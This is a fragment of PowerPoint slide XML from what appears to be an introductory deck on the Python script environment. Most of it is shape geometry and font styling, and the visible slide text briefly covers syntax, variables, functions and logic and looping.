                  <a:lnTo>
                    <a:pt x="4134709" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232147" y="712469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232147" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654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743961" y="5392673"/>
              <a:ext cx="4232275" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4232275" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="142493"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7260" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232147" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232147" y="712469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="712469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142493"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2540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3587877" y="5626049"/>
            <a:ext cx="254381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Orchestra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ion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ols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604502" y="5379973"/>
            <a:ext cx="4257675" cy="880744"/>
            <a:chOff x="9604502" y="5379973"/>
            <a:chExt cx="4257675" cy="880744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9617202" y="5392673"/>
              <a:ext cx="4232275" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4232275" h="855345">
                  <a:moveTo>
                    <a:pt x="4089654" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142494" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="712469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232148" y="712469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232148" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654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9617202" y="5392673"/>
              <a:ext cx="4232275" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4232275" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="142493"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7260" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232148" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232148" y="712469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="712469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142493"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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11287759" y="5624525"/>
            <a:ext cx="8890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Syntax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25159" y="306451"/>
            <a:ext cx="480758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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Python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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environment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26155" y="1756298"/>
            <a:ext cx="10607675" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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Python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popular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language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implementing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all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kinds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development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projects.</a:t>
            </a:r>
            <a:endParaRPr sz="2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1395"/>
              </a:spcBef>
            </a:pP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Some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elements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Python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script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environment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as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follows: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4400" y="760476"/>
            <a:ext cx="6984492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847469" y="3179445"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="3179445"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="3656838"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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869186" y="3188970"/>
              <a:ext cx="4319270" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="467995">
                  <a:moveTo>
                    <a:pt x="4241038" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312886" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296171" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271385" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4241038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869186" y="3188970"/>
              <a:ext cx="4319270" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="467995">
                  <a:moveTo>
                    <a:pt x="77977" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4241038" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271385" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296171" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312886" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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045589" y="4030167"/>
            <a:ext cx="571373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Python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has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case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sensitivity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indentation.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52320" y="3223641"/>
            <a:ext cx="289433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8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dirty="0" sz="2200" spc="8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7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22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sy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>x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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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7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847469" y="4988052"/>
            <a:ext cx="12563475" cy="1558925"/>
            <a:chOff x="1847469" y="4988052"/>
            <a:chExt cx="12563475" cy="1558925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="5458206"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646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868424" y="4988052"/>
              <a:ext cx="4319270" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="469900">
                  <a:moveTo>
                    <a:pt x="4240784" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312864" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296092" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271224" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4240784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2052320" y="5801614"/>
            <a:ext cx="758761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Python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uses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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>=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operator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assign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name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variable.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52320" y="5024120"/>
            <a:ext cx="121793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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Va</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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iables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884045" y="6787895"/>
            <a:ext cx="12563475" cy="1558925"/>
            <a:chOff x="1884045" y="6787895"/>
            <a:chExt cx="12563475" cy="1558925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1893570" y="7258049"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88645"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455397" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455397" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88645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905000" y="6787895"/>
              <a:ext cx="4319270" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="469900">
                  <a:moveTo>
                    <a:pt x="4240784" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312864" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296092" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271224" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4240784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2088895" y="7630769"/>
            <a:ext cx="7734934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Functions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used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produce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modular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reusable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code.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088895" y="6856603"/>
            <a:ext cx="128587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Functions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25159" y="306451"/>
            <a:ext cx="480758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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Python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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environment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26508" y="760476"/>
            <a:ext cx="6588252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931289" y="2324100"/>
            <a:ext cx="12563475" cy="1558925"/>
            <a:chOff x="1931289" y="2324100"/>
            <a:chExt cx="12563475" cy="1558925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1940814" y="2794254"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646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952244" y="2324100"/>
              <a:ext cx="4320540" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="469900">
                  <a:moveTo>
                    <a:pt x="4242308" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4314388" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4297616" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4272748" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4242308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2137029" y="2359913"/>
            <a:ext cx="10721340" cy="9683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85">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Logi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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an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loo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pi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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7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sta</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
